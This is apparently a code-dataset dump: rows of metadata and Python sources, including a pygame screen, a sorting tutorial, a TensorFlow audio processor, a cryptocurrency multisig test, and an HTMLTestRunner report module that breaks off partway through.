blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7dd4a52eccf53f87ba02f0c31ca36819d8d641e7
|
6cd799da036e019e61ca25351c3c2b368aeda6f4
|
/lossScreenTest.py
|
30158367f332718455312c2b49e234747e0a7977
|
[] |
no_license
|
Tammon23/IceCream-Jump-recreate
|
d78f3c7c6352d8bef540df4cc5b182fdd76f543e
|
bfcdf2bb823b9ebae6e9e399c974f358d8d2c61e
|
refs/heads/master
| 2021-05-09T20:56:00.489803
| 2018-01-28T03:47:05
| 2018-01-28T03:47:05
| 118,714,755
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,336
|
py
|
import math, random
import pygame
from pygame.locals import *
from settings import *
from functions import *
lossScreen = True
while lossScreen:
pygame.event.pump()
k = pygame.key.get_pressed()
if k[pygame.K_q] or k[pygame.K_ESCAPE]:
break
#start Splash screen
screen.fill(sBackground)
line1 = font2.render("You Lose!", True, BLACK)
line2 = font5.render("Your final score was: " + str(points), True, BLACK)
screen.blit(line1, (90, 100))
screen.blit(line2, (90, 210))
line3 = font1.render("- By Ikenna Uduh", True, BLACK)
screen.blit(line3, (w - 150, h - 25))
x,y = pygame.mouse.get_pos()
pygame.draw.circle(screen, sPAgainButtonClr, (int(w/2), int(h/2 + 50)), RAD3)
pygame.draw.circle(screen, BLACK, (int(w/2), int(h/2 + 50)), RAD3, 10)
line3 = font3.render("PLAY", True, BLACK)
line4 = font3.render("AGAIN", True, BLACK)
screen.blit(line3, (int(w/2) - 120, 400))
screen.blit(line4, (int(w/2) - 120, 500))
# Checking to see if the clicked mouse is pressing the PLAY or HELP buttons
if checkInCir(int(w/2), int(h/2 + 50), y, x, RAD3):
sPAgainButtonClr = sButtonClrPressed
if pygame.mouse.get_pressed()[0]:
gameStart = True
else:
sPAgainButtonClr = sButtonClr
pygame.display.flip()
pygame.quit()
|
[
"Tammon2000@gmail.com"
] |
Tammon2000@gmail.com
|
fdec487f680975aba7bad02c2d5c07d9a4a332aa
|
a269305ed7ae331ce13a6581659d6c8eed98f81d
|
/demo14_sorted.py
|
97e080c88a542a7f135f69332ebbb12dde1d41d6
|
[] |
no_license
|
Honfeil/pythonWorkspace
|
e3490330350ef862526029a4f441a14bf14281c7
|
25c7b8a7d665a69c9adb84f468abeb483b27b7d4
|
refs/heads/master
| 2021-01-15T17:50:16.677942
| 2017-10-07T16:19:51
| 2017-10-07T16:19:51
| 99,761,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 633
|
py
|
# -- coding:utf-8 --
# sorted()
li = sorted([35, 58, 42, 4, 65, 4, 5, 5, 2, 4, 55, 14, 5])
print(li)
li = [-5, 6, -7, 8, -9]
print(sorted(li))
print(sorted(li, key=abs))
# 字符串排序
li = ['Candy', 'Honey', 'atom', 'bust', 'Bug']
print(sorted(li))
print(sorted(li, key=str.lower))
# 复习map
li = list(map(lambda s: s.capitalize(), li))
print(sorted(li, reverse=True))
# 假设我们用一组tuple表示学生名字和成绩:
L = [('Bob', 75), ('Adam', 92), ('Bart', 66), ('Lisa', 88)]
def sk(m):
return m[0]
def ss(m):
return m[1]
print(sorted(L, key=sk))
print(sorted(L, key=ss, reverse=True))
|
[
"honfeil.163.com"
] |
honfeil.163.com
|
022da1ef07e8a25cde535e2903bacc012f2e4f9b
|
74aa886d0e28c2792751a45a8392e9ffb8ca45e1
|
/base/utils/type_utils.py
|
b73f49014a848cb05a500b6712c84a0fe733b36b
|
[] |
no_license
|
bluesky139/MjolnirTornado
|
16d7cb3ecb6748bd557396de471846f7f09bd860
|
18fd0567dbb167423d0079ed86d7b191fe1cb77b
|
refs/heads/master
| 2020-06-01T05:24:43.707431
| 2019-12-27T07:05:05
| 2019-12-27T07:05:05
| 94,063,353
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,019
|
py
|
import re
from base import *
class List(object):
@classmethod
def parse(cls, value, except_class=InvalidArguments, except_message='Can\'t convert list.'):
try:
return value.split('|')
except:
raise except_class('Invalid list format, %s', except_message)
class Int(object):
@classmethod
def parse(cls, value, except_class=InvalidArguments, except_message='Can\'t convert int.'):
try:
return int(value)
except:
raise except_class('Invalid int, %s', except_message)
class Float(object):
@classmethod
def parse(cls, value, except_class=InvalidArguments, except_message='Can\'t convert float.'):
try:
return float(value)
except:
raise except_class('Invalid float, %s', except_message)
class Bool(object):
@classmethod
def parse(cls, value, except_class=InvalidArguments, except_message='Can\'t convert bool.'):
return value in [True, 'True', 'true', 'TRUE', '1', 1]
class Dict(object):
@classmethod
def make_sure_key(cls, value, key, default_value=''):
if key not in value:
value[key] = default_value
class NoConvert(object):
@classmethod
def parse(cls, value, except_class=None, except_message=None):
return value
class String(object):
VALID_STR_LETTER = int('001', 2)
VALID_STR_DIGIT = int('010', 2)
VALID_STR_UNDERSCORE = int('100', 2)
_valid_str_regs = {}
@classmethod
def validate(cls, s, flag, except_class=InvalidArguments, except_message='Invalid string'):
global _valid_str_regs
if flag not in _valid_str_regs:
reg = r'^['
if flag & cls.VALID_STR_LETTER:
reg += r'a-zA-Z'
if flag & cls.VALID_STR_DIGIT:
reg += r'\d'
if flag & cls.VALID_STR_UNDERSCORE:
reg += r'_'
reg += r']+$'
reg = re.compile(reg)
_valid_str_regs[flag] = reg
reg = _valid_str_regs[flag]
if reg.match(s) is None:
raise except_class('%s, %s' % (except_message, s))
return False
return True
@classmethod
def lower_upper_with_underscore(cls, s):
return ''.join('_' + c.lower() if c.isupper() else c for c in s).lstrip('_')
|
[
"bluesky139@gmail.com"
] |
bluesky139@gmail.com
|
cd443962bf7cf38b44666bf351ee733655fb1f43
|
539c7a9147965b248625b5bb3507737f141accf2
|
/20_Funcs_Files.py
|
9981781a1e970eb4b12316ebee246d94671f8b00
|
[] |
no_license
|
rtvalluri/LearnPythonTHW
|
24c775ff43cb21cf49531d6ecf57c49810c61ea5
|
9104b53a25421a18ddd33b8d2a47ff3b13c3eea3
|
refs/heads/master
| 2021-01-10T18:34:12.352028
| 2015-03-02T06:55:11
| 2015-03-02T06:55:11
| 21,772,104
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 556
|
py
|
from sys import argv
scriptname,filename = argv
def print_all(f):
print f.read()
def rewind(f):
f.seek(0) #to the starting of file
#f.seek(2) to the end of file
#f.seek(1) from the current position exactly
#f.seek(-3,2) to the 3rd byte from the end
def print_line(f):
print f.readline()
current_file = open(filename)
print "\nPrinting entire File"
print_all(current_file)
print "\nRewinding"
rewind(current_file)
print "\nPrinting line by line\n"
print_line(current_file)
print_line(current_file)
print_line(current_file)
current_file.close()
|
[
"valluriraviteja@gmail.com"
] |
valluriraviteja@gmail.com
|
3f7354b9288836c07c2c87bd9ffea73108e2c462
|
5390bfe2cb9732547ca36d655bc206665b357e97
|
/pytorch/audio_tf.py
|
c35a7dda5c040071bdcc5f92d87849bbad8e496e
|
[
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
vladbataev/nv-wavenet
|
71682ad79e6107f44dd50726db27ce657280623a
|
2e16155cef2a460bb7862df674a1b8fa074a5cab
|
refs/heads/master
| 2020-03-28T17:11:06.953684
| 2019-08-02T14:35:05
| 2019-08-02T14:35:05
| 148,765,145
| 1
| 0
|
BSD-3-Clause
| 2018-09-14T09:14:19
| 2018-09-14T09:14:18
| null |
UTF-8
|
Python
| false
| false
| 4,660
|
py
|
import json
import librosa
import math
import numpy as np
import tensorflow as tf
LOG10_TO_LN = math.log(10)
LN_TO_LOG10 = 1 / LOG10_TO_LN
DB_TO_LN = LOG10_TO_LN / 20
LN_TO_DB = 20 * LN_TO_LOG10 # 20 as the power is proportional to power of amplitude
class AudioProcessor:
def __init__(self, audio_config):
params = self._load_params(audio_config)
for k, v in params.items():
self.__setattr__(k, v)
@staticmethod
def _load_params(filepath):
with open(filepath) as fin:
params = json.load(fin)
return params
def _name_to_window_fn(self, name):
mapping = {
"hann": tf.contrib.signal.hann_window,
"hamming": tf.contrib.signal.hamming_window,
}
return mapping[name]
def preemphasis(self, signals):
paddings = [
[0, 0],
[0, 0],
[1, 0]
]
emphasized = tf.pad(signals[:, :, :-1], paddings=paddings) * -self.preemphasis_coef + signals
return emphasized
def deemphasis(self, signal):
fir_approximation = [1]
for i in range(math.ceil(1 / (1 - self.preemphasis_coef))):
fir_approximation.append(fir_approximation[-1] * self.preemphasis_coef)
filters = tf.constant(fir_approximation[::-1], dtype=tf.float32, shape=(len(fir_approximation), 1, 1))
paddings = [
[0, 0],
[len(fir_approximation), 0],
]
signal = tf.pad(signal, paddings)
return tf.nn.conv1d(signal[:, :, None], filters, 1, data_format="NWC", padding="VALID")[:, :, 0]
def amp_to_db(self, signal):
return LN_TO_DB * tf.log(tf.maximum(self.min_level, signal))
def dbfs_normalize(self, signal):
max_value = tf.reduce_max(signal, axis=[1, 2, 3], keepdims=True)
return signal - max_value
def normalize_and_clip_db(self, signal_db):
"""
Clips signal in decibels to [0; -min_level_db] and then normalizes it to [-max_abs_value; max_abs_value]
in case symmetric output or to [0; max_abs_value] otherwise.
:param signal_db:
:return: clipped signal in decibels to [-max_abs_value; max_abs_value] or [0; max_abs_value].
"""
clipped = signal_db - self.min_level_db
normalized = tf.clip_by_value(clipped / -self.min_level_db, 0, 1)
if self.symmetric_output:
normalized = (normalized * 2 - 1)
# so output now in [-1; 1]
normalized *= self.max_abs_value
return normalized
def linear_scale_to_normalized_log_scale(self, spectrogram):
spectrogram_db = self.amp_to_db(spectrogram)
if self.dbfs_normalization:
spectrogram_db = self.dbfs_normalize(spectrogram_db)
spectrogram_db -= self.ref_level_db
return self.normalize_and_clip_db(spectrogram_db)
def _mel_basis(self):
if self.use_tf_mel_basis:
mel_basis = tf.contrib.signal.linear_to_mel_weight_matrix(
self.num_mel_bins, self.window_size // 2 + 1, self.sample_rate,
self.lower_edge_hertz, self.upper_edge_hertz
)
else:
mel_basis = librosa.filters.mel(
sr=self.sample_rate,
n_fft=self.window_size,
n_mels=self.num_mel_bins,
fmin=self.lower_edge_hertz,
fmax=self.upper_edge_hertz
)
mel_basis = tf.convert_to_tensor(np.transpose(mel_basis, (1, 0)), dtype=tf.float32)
return mel_basis
def compute_spectrum(self, signal):
"""
:param signals: shape [batch_size, 1, num_timestamps]
:param lengths:
:param sample_rate:
:return:
"""
with tf.name_scope("extract_feats"):
frame_length = self.window_size
frame_step = self.window_step
signals = signal[None, None, ...]
if self.apply_preemphasis:
signals = self.preemphasis(signals)
stfts = tf.contrib.signal.stft(signals, frame_length=frame_length, frame_step=frame_step,
fft_length=frame_length,
window_fn=self._name_to_window_fn(self.window_fn_name),
pad_end=True)
linear_spectrograms = tf.abs(stfts)
mel_spectrograms = tf.tensordot(linear_spectrograms, self._mel_basis(), 1)
normed_mel_spectrograms_db = self.linear_scale_to_normalized_log_scale(mel_spectrograms)
return tf.transpose(normed_mel_spectrograms_db[0, 0], (1, 0))
|
[
"v.bataev@tinkoff.ru"
] |
v.bataev@tinkoff.ru
|
8177accba9ea1009914fc04bc9522e187b19a4bc
|
82008bbe06f77d17898565e20d08bf34bf28c313
|
/test/functional/wallet_scriptaddress2.py
|
4c431a5ed81f6d5e0aac1749f833e51d0f3e9782
|
[
"MIT"
] |
permissive
|
hantobi-europe/aox
|
6e6884c852fcb08f8c5d89384c9ae60746d3f149
|
74cd6d07a0d4058648dbb5bc42d829a04a0e5327
|
refs/heads/main
| 2023-02-07T20:36:36.487504
| 2020-12-28T18:11:13
| 2020-12-28T18:11:13
| 323,902,355
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,968
|
py
|
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test new aox multisig prefix functionality.
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class ScriptAddress2Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 3
self.setup_clean_chain = True
self.extra_args = [['-addresstype=legacy', '-deprecatedrpc=accounts', '-txindex=1'], [], ['-txindex=1']]
def setup_network(self, split=False):
self.setup_nodes()
connect_nodes(self.nodes[1], 0)
connect_nodes(self.nodes[2], 0)
self.sync_all()
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
cnt = self.nodes[0].getblockcount()
# Mine some blocks
self.nodes[1].generate(101)
self.sync_all()
if (self.nodes[0].getblockcount() != cnt + 101):
raise AssertionError("Failed to mine 100 blocks")
addr = self.nodes[0].getnewaddress()
addr2 = self.nodes[0].getnewaddress()
multisig_addr = self.nodes[0].addmultisigaddress(2, [addr, addr2], "multisigaccount")['address']
assert_equal(multisig_addr[0], 'Q')
# Send to a new multisig address
txid = self.nodes[1].sendtoaddress(multisig_addr, 1)
self.nodes[1].generate(101)
self.sync_all()
tx = self.nodes[0].getrawtransaction(txid, 1)
dest_addrs = [tx["vout"][0]['scriptPubKey']['addresses'][0],
tx["vout"][1]['scriptPubKey']['addresses'][0]]
assert(multisig_addr in dest_addrs)
# Spend from the new multisig address
addr3 = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr3, 0.8)
self.nodes[0].generate(2)
self.sync_all()
assert(self.nodes[0].getbalance("*", 1) < 0.2)
assert(self.nodes[1].listtransactions()[-1]['address'] == addr3)
# Send to an old multisig address. The api addmultisigaddress
# can only generate a new address so we manually compute
# multisig_addr_old beforehand using an old client.
priv_keys = ["cU7eeLPKzXeKMeZvnEJhvZZ3tLqVF3XGeo1BbM8dnbmV7pP3Qg89",
"cTw7mRhSvTfzqCt6MFgBoTBqwBpYu2rWugisXcwjv4cAASh3iqPt"]
addrs = ["mj6gNGRXPXrD69R5ApjcsDerZGrYKSfb6v",
"mqET4JA3L7P7FoUjUP3F6m6YsLpCkyzzou"]
self.nodes[0].importprivkey(priv_keys[0])
self.nodes[0].importprivkey(priv_keys[1])
multisig_addr_new = self.nodes[0].addmultisigaddress(2, addrs, "multisigaccount2")['address']
assert_equal(multisig_addr_new, 'QZ974ZrPrmqMmm1PSVp4m8YEgo3bCQZBbe')
multisig_addr_old = "2N5nLwYz9qfnGdaFLpPn3gS6oYQbmLTWPjq"
# Let's send to the old address. We can then find it in the
# new address with the new client. So basically the old
# address and the new one are the same thing.
txid = self.nodes[1].sendtoaddress(multisig_addr_old, 1)
self.nodes[1].generate(1)
self.sync_all()
tx = self.nodes[2].getrawtransaction(txid, 1)
dest_addrs = [tx["vout"][0]['scriptPubKey']['addresses'][0],
tx["vout"][1]['scriptPubKey']['addresses'][0]]
assert(multisig_addr_new in dest_addrs)
assert(multisig_addr_old not in dest_addrs)
# Spend from the new multisig address
addr4 = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr4, 0.8)
self.nodes[0].generate(2)
self.sync_all()
assert(self.nodes[0].getbalance("*", 1) < 0.4)
assert(self.nodes[1].listtransactions()[-1]['address'] == addr4)
if __name__ == '__main__':
ScriptAddress2Test().main()
|
[
"hantobieurope@gmail.com"
] |
hantobieurope@gmail.com
|
e94744e7b239a81f6c68a4137135d89cf5d8165c
|
d83892a8df7127154d99bf0e4cc3215f971fef01
|
/HTMLTestRunner.py
|
af409dc5b99e2d51b346cb452de2cdc3db682829
|
[] |
no_license
|
gxq0909/bowentest
|
ae4436947026380822b3bf8d570b9f2fd2f510fe
|
1d78612b493e499721634a1f66a700c6d21f838e
|
refs/heads/master
| 2023-01-12T13:45:15.203004
| 2020-11-17T02:27:54
| 2020-11-17T02:27:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,921
|
py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2018/11/19 下午3:03
# @Author : 张新礼
# @File : HTMLTestRunner.py
# @Software: PyCharm
"""
A TestRunner for use with the Python unit testing framework. It
generates a HTML report to show the result at a glance.
The simplest way to use this is to invoke its main method. E.g.
import unittest
import HTMLTestRunner
... define your tests ...
if __name__ == '__main__':
HTMLTestRunner.main()
For more customization options, instantiates a HTMLTestRunner object.
HTMLTestRunner is a counterpart to unittest's TextTestRunner. E.g.
# output to a file
fp = file('my_report.html', 'wb')
runner = HTMLTestRunner.HTMLTestRunner(
stream=fp,
title='My unit stUDY',
description='This demonstrates the report output by HTMLTestRunner.'
)
# Use an external stylesheet.
# See the Template_mixin class for more customizable options
runner.STYLESHEET_TMPL = '<link rel="stylesheet" href="my_stylesheet.css" type="text/css">'
# run the stUDY
runner.run(my_test_suite)
------------------------------------------------------------------------
Copyright (c) 2004-2007, Wai Yip Tung
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name Wai Yip Tung nor the names of its contributors may be
used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
# URL: http://tungwaiyip.info/software/HTMLTestRunner.html
__author__ = "Wai Yip Tung, Findyou"
__version__ = "0.8.2.2"
"""
Change History
Version 0.8.2.1 -Findyou
* 改为支持python3
Version 0.8.2.1 -Findyou
* 支持中文,汉化
* 调整样式,美化(需要连入网络,使用的百度的Bootstrap.js)
* 增加 通过分类显示、测试人员、通过率的展示
* 优化“详细”与“收起”状态的变换
* 增加返回顶部的锚点
Version 0.8.2
* Show output inline instead of popup window (Viorel Lupu).
Version in 0.8.1
* Validated XHTML (Wolfgang Borgert).
* Added description of stUDY classes and stUDY cases.
Version in 0.8.0
* Define Template_mixin class for customization.
* Workaround a IE 6 bug that it does not treat <script> block as CDATA.
Version in 0.7.1
* Back port to Python 2.3 (Frank Horowitz).
* Fix missing scroll bars in detail log (Podi).
"""
# TODO: color stderr
# TODO: simplify javascript using ,ore than 1 class in the class attribute?
import datetime
import io
import sys
import time
import unittest
from xml.sax import saxutils
import sys
# ------------------------------------------------------------------------
# The redirectors below are used to capture output during testing. Output
# sent to sys.stdout and sys.stderr are automatically captured. However
# in some cases sys.stdout is already cached before HTMLTestRunner is
# invoked (e.g. calling logging.basicConfig). In order to capture those
# output, use the redirectors for the cached stream.
#
# e.g.
# >>> logging.basicConfig(stream=HTMLTestRunner.stdout_redirector)
# >>>
class OutputRedirector(object):
""" Wrapper to redirect stdout or stderr """
def __init__(self, fp):
self.fp = fp
def write(self, s):
self.fp.write(s)
def writelines(self, lines):
self.fp.writelines(lines)
def flush(self):
self.fp.flush()
stdout_redirector = OutputRedirector(sys.stdout)
stderr_redirector = OutputRedirector(sys.stderr)
# ----------------------------------------------------------------------
# Template
class Template_mixin(object):
"""
Define a HTML template for report customerization and generation.
Overall structure of an HTML report
HTML
+------------------------+
|<html> |
| <head> |
| |
| STYLESHEET |
| +----------------+ |
| | | |
| +----------------+ |
| |
| </head> |
| |
| <body> |
| |
| HEADING |
| +----------------+ |
| | | |
| +----------------+ |
| |
| REPORT |
| +----------------+ |
| | | |
| +----------------+ |
| |
| ENDING |
| +----------------+ |
| | | |
| +----------------+ |
| |
| </body> |
|</html> |
+------------------------+
"""
STATUS = {
0: '通过',
1: '失败',
2: '错误',
}
DEFAULT_TITLE = '单元测试报告'
DEFAULT_DESCRIPTION = ''
DEFAULT_TESTER='QAHE'
# ------------------------------------------------------------------------
# HTML Template
HTML_TMPL = r"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(title)s</title>
<meta name="generator" content="%(generator)s"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<link href="http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css" rel="stylesheet">
<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<script src="http://libs.baidu.com/bootstrap/3.0.3/js/bootstrap.min.js"></script>
%(stylesheet)s
</head>
<body >
<script language="javascript" type="text/javascript">
output_list = Array();
/*level 调整增加只显示通过用例的分类 --Findyou
0:Summary //all hiddenRow
1:Failed //pt hiddenRow, ft none
2:Pass //pt none, ft hiddenRow
3:All //pt none, ft none
*/
function showCase(level) {
trs = document.getElementsByTagName("tr");
for (var i = 0; i < trs.length; i++) {
tr = trs[i];
id = tr.id;
if (id.substr(0,2) == 'ft') {
if (level == 2 || level == 0 ) {
tr.className = 'hiddenRow';
}
else {
tr.className = '';
}
}
if (id.substr(0,2) == 'pt') {
if (level < 2) {
tr.className = 'hiddenRow';
}
else {
tr.className = '';
}
}
}
//加入【详细】切换文字变化 --Findyou
detail_class=document.getElementsByClassName('detail');
//console.log(detail_class.length)
if (level == 3) {
for (var i = 0; i < detail_class.length; i++){
detail_class[i].innerHTML="收起"
}
}
else{
for (var i = 0; i < detail_class.length; i++){
detail_class[i].innerHTML="详细"
}
}
}
function showClassDetail(cid, count) {
var id_list = Array(count);
var toHide = 1;
for (var i = 0; i < count; i++) {
//ID修改 点 为 下划线 -Findyou
tid0 = 't' + cid.substr(1) + '_' + (i+1);
tid = 'f' + tid0;
tr = document.getElementById(tid);
if (!tr) {
tid = 'p' + tid0;
tr = document.getElementById(tid);
}
id_list[i] = tid;
if (tr.className) {
toHide = 0;
}
}
for (var i = 0; i < count; i++) {
tid = id_list[i];
//修改点击无法收起的BUG,加入【详细】切换文字变化 --Findyou
if (toHide) {
document.getElementById(tid).className = 'hiddenRow';
document.getElementById(cid).innerText = "详细"
}
else {
document.getElementById(tid).className = '';
document.getElementById(cid).innerText = "收起"
}
}
}
function html_escape(s) {
s = s.replace(/&/g,'&');
s = s.replace(/</g,'<');
s = s.replace(/>/g,'>');
return s;
}
</script>
%(heading)s
%(report)s
%(ending)s
</body>
</html>
"""
# variables: (title, generator, stylesheet, heading, report, ending)
# ------------------------------------------------------------------------
# Stylesheet
#
# alternatively use a <link> for external style sheet, e.g.
# <link rel="stylesheet" href="$url" type="text/css">
STYLESHEET_TMPL = """
<style type="text/css" media="screen">
body { font-family: Microsoft YaHei,Tahoma,arial,helvetica,sans-serif;padding: 30px; font-size: 10px; }
table { font-size: 30px; }
/* -- heading ---------------------------------------------------------------------- */
.heading {
margin-top: 0ex;
margin-bottom: 1ex;
}
.heading .description {
margin-top: 4ex;
margin-bottom: 6ex;
}
/* -- report ------------------------------------------------------------------------ */
#total_row { font-weight: bold; }
.passCase { color: #5cb85c; }
.failCase { color: #d9534f; font-weight: bold; }
.errorCase { color: #f0ad4e; font-weight: bold; }
.hiddenRow { display: none; }
.testcase { margin-left: 2em; }
</style>
"""
# ------------------------------------------------------------------------
# Heading
#
HEADING_TMPL = """<div class='heading'>
<h1 style="font-family: Microsoft YaHei">%(title)s</h1>
%(parameters)s
<p class='description'>%(description)s</p>
</div>
""" # variables: (title, parameters, description)
HEADING_ATTRIBUTE_TMPL = """<p class='attribute'><strong>%(name)s : </strong> %(value)s</p>
""" # variables: (name, value)
# ------------------------------------------------------------------------
# Report
#
# 汉化,加美化效果 --Findyou
REPORT_TMPL = """
<p id='show_detail_line'>
<a class="btn btn-primary" href='javascript:showCase(0)'>概要{ %(passrate)s }</a>
<a class="btn btn-danger" href='javascript:showCase(1)'>失败{ %(fail)s }</a>
<a class="btn btn-success" href='javascript:showCase(2)'>通过{ %(Pass)s }</a>
<a class="btn btn-info" href='javascript:showCase(3)'>所有{ %(count)s }</a>
</p>
<table id='result_table' class="table table-condensed table-bordered table-hover">
<colgroup>
<col align='left' />
<col align='right' />
<col align='right' />
<col align='right' />
<col align='right' />
<col align='right' />
</colgroup>
<tr id='header_row' class="text-center success" style="font-weight: bold;font-size: 14px;">
<td>用例集/测试用例</td>
<td>总计</td>
<td>通过</td>
<td>失败</td>
<td>错误</td>
<td>详细</td>
</tr>
%(test_list)s
<tr id='total_row' class="text-center active">
<td>总计</td>
<td>%(count)s</td>
<td>%(Pass)s</td>
<td>%(fail)s</td>
<td>%(error)s</td>
<td>通过率:%(passrate)s</td>
</tr>
</table>
""" # variables: (test_list, count, Pass, fail, error ,passrate)
REPORT_CLASS_TMPL = r"""
<tr class='%(style)s warning'>
<td>%(desc)s</td>
<td class="text-center">%(count)s</td>
<td class="text-center">%(Pass)s</td>
<td class="text-center">%(fail)s</td>
<td class="text-center">%(error)s</td>
<td class="text-center"><a href="javascript:showClassDetail('%(cid)s',%(count)s)" class="detail" id='%(cid)s'>详细</a></td>
</tr>
""" # variables: (style, desc, count, Pass, fail, error, cid)
#失败 的样式,去掉原来JS效果,美化展示效果 -Findyou
REPORT_TEST_WITH_OUTPUT_TMPL = r"""
<tr id='%(tid)s' class='%(Class)s'>
<td class='%(style)s'><div class='testcase'>%(desc)s</div></td>
<td colspan='5' align='center'>
<!--默认收起错误信息 -Findyou
<button id='btn_%(tid)s' type="button" class="btn btn-danger btn-xs collapsed" data-toggle="collapse" data-target='#div_%(tid)s'>%(status)s</button>
<div id='div_%(tid)s' class="collapse"> -->
<!-- 默认展开错误信息 -Findyou -->
<button id='btn_%(tid)s' type="button" class="btn btn-danger btn-xs" data-toggle="collapse" data-target='#div_%(tid)s'>%(status)s</button>
<div id='div_%(tid)s' class="collapse in">
<pre>
%(script)s
</pre>
</div>
</td>
</tr>
""" # variables: (tid, Class, style, desc, status)
# 通过 的样式,加标签效果 -Findyou
REPORT_TEST_NO_OUTPUT_TMPL = r"""
<tr id='%(tid)s' class='%(Class)s'>
<td class='%(style)s'><div class='testcase'>%(desc)s</div></td>
<td colspan='5' align='center'><span class="label label-success success">%(status)s</span></td>
</tr>
""" # variables: (tid, Class, style, desc, status)
REPORT_TEST_OUTPUT_TMPL = r"""
%(id)s: %(output)s
<img %(hidde)s src="%(image)s" alt="picture_shot" height="480" width="800"></img>
<a %(hidde)s href="%(image)s">picture_shot</a>
""" # variables: (id, output)
# ------------------------------------------------------------------------
# ENDING
#
# 增加返回顶部按钮 --Findyou
ENDING_TMPL = """<div id='ending'> </div>
<div style=" position:fixed;right:50px; bottom:30px; width:20px; height:20px;cursor:pointer">
<a href="#"><span class="glyphicon glyphicon-eject" style = "font-size:30px;" aria-hidden="true">
</span></a></div>
"""
# -------------------- The end of the Template class -------------------
TestResult = unittest.TestResult
class _TestResult(TestResult):
# note: _TestResult is a pure representation of results.
# It lacks the output and reporting ability compares to unittest._TextTestResult.
def __init__(self, verbosity=1):
TestResult.__init__(self)
self.stdout0 = None
self.stderr0 = None
self.success_count = 0
self.failure_count = 0
self.error_count = 0
self.verbosity = verbosity
# result is a list of result in 4 tuple
# (
# result code (0: success; 1: fail; 2: error),
# TestCase object,
# Test output (byte string),
# stack trace,
# )
self.result = []
#增加一个测试通过率 --Findyou
self.passrate=float(0)
def startTest(self, test):
TestResult.startTest(self, test)
# just one buffer for both stdout and stderr
self.outputBuffer = io.StringIO()
stdout_redirector.fp = self.outputBuffer
stderr_redirector.fp = self.outputBuffer
self.stdout0 = sys.stdout
self.stderr0 = sys.stderr
sys.stdout = stdout_redirector
sys.stderr = stderr_redirector
def complete_output(self):
"""
Disconnect output redirection and return buffer.
Safe to call multiple times.
"""
if self.stdout0:
sys.stdout = self.stdout0
sys.stderr = self.stderr0
self.stdout0 = None
self.stderr0 = None
return self.outputBuffer.getvalue()
def stopTest(self, test):
# Usually one of addSuccess, addError or addFailure would have been called.
# But there are some path in unittest that would bypass this.
# We must disconnect stdout in stopTest(), which is guaranteed to be called.
self.complete_output()
def addSuccess(self, test):
self.success_count += 1
TestResult.addSuccess(self, test)
output = self.complete_output()
self.result.append((0, test, output, ''))
if self.verbosity > 1:
sys.stderr.write('ok ')
